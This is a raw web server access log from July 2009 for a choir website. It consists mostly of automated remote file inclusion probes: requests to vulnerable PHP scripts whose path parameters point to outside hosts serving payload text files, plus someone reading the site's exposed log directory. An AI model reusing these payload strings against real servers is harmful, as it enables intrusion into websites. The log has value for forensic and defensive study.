122.153.28.140 - - [04/Jul/2009:07:00:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:00:56 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:00:56 -0700] "GET /logs/access_090622.log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:00:56 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:00:58 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:00:58 -0700] "GET /logs/access_090622.log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:07:01:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:07:01:53 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:07:01:53 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:07:02:16 -0700] "GET /logs/access_090622.log/modules/My_eGallery/index.php?basepath=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.3.159.205 - - [04/Jul/2009:07:02:40 -0700] "GET /logs/ HTTP/1.1" 200 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.americanboyschoir.com"
123.3.159.205 - - [04/Jul/2009:07:02:43 -0700] "GET /logs/access.log HTTP/1.1" 200 79002 "http://www.americanboyschoir.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.americanboyschoir.com"
123.3.159.205 - - [04/Jul/2009:07:02:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:04:34 -0700] "GET /logs//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:04:34 -0700] "GET /admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:04:34 -0700] "GET /logs/access_090517.log//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:26 -0700] "GET /admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:26 -0700] "GET /logs//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:26 -0700] "GET /logs/access_090517.log%20%20//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.3.159.205 - - [04/Jul/2009:07:06:35 -0700] "GET /logs/ HTTP/1.1" 200 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:45 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:45 -0700] "GET /admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:45 -0700] "GET /logs//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.3.159.205 - - [04/Jul/2009:07:06:45 -0700] "GET /logs/access_090704.log HTTP/1.1" 200 1004454 "http://www.americanboyschoir.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:06:53 -0700] "GET /logs/access_090528.log%20%20//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:08:28 -0700] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:08:28 -0700] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:08:28 -0700] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:08:37 -0700] "GET /logs/access_090626.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.232.54.48 - - [04/Jul/2009:07:15:26 -0700] "GET /logs/access_090626.log%20%20/phphtml.php?htmlclass_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
88.191.37.60 - - [04/Jul/2009:07:16:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
88.191.37.60 - - [04/Jul/2009:07:16:55 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
88.191.37.60 - - [04/Jul/2009:07:17:12 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:17:22 -0700] "GET /logs/access_090626.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:17:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:17:23 -0700] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:17:56 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:35 -0700] "GET /xxx/ HTTP/1.1" 200 662 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:37 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:41 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:47 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:50 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:19:55 -0700] "GET /xxxx/ HTTP/1.1" 200 522 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:00 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:03 -0700] "GET /x/ HTTP/1.1" 200 516 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:08 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/x/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:12 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:16 -0700] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:07:20:22 -0700] "GET /modules/My_eGallery/index.php?basepath=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:07:20:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:07:20:22 -0700] "GET /logs/access_090622.log%20%20/modules/My_eGallery/index.php?basepath=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.160.213.22 - - [04/Jul/2009:07:20:23 -0700] "GET /xxxxxxxxxx/ HTTP/1.1" 200 534 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:28 -0700] "GET //vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:28 -0700] "GET /logs///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:28 -0700] "GET /logs/access_090626.log%20%20///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:29 -0700] "GET //vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:29 -0700] "GET /logs/access_090626.log%20%20///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:20:29 -0700] "GET /logs///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:20:52 -0700] "GET /logs/access_090622.log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:20:52 -0700] "GET /logs/access_090622.log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:21:28 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:21:28 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:07:24:50 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:07:24:50 -0700] "GET /logs/access_090612.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:07:24:50 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.97.221.30 - - [04/Jul/2009:07:26:43 -0700] "GET /logs/access_090622.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.110.147.217 - - [04/Jul/2009:07:27:22 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:10 -0700] "GET /logs/access_090129.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:10 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:36 -0700] "GET /logs/access_090129.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:36 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
89.97.206.137 - - [04/Jul/2009:07:29:42 -0700] "GET /logs/access_090626.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.americanboyschoir.com"
89.97.206.137 - - [04/Jul/2009:07:29:42 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.americanboyschoir.com"
89.97.206.137 - - [04/Jul/2009:07:29:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:29:52 -0700] "GET /logs/access_090203.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:30:13 -0700] "GET /logs/access_090203.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
89.97.206.137 - - [04/Jul/2009:07:30:43 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /logs/access.log/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:46 -0700] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:31:46 -0700] "GET /logs/access.log%20%20/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:01 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:01 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:01 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:07 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:32:07 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:32:38 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:33:45 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:33:45 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:33:45 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:34:11 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:34:11 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/access_090528.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:34:22 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:34:27 -0700] "GET /logs/access_090603.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
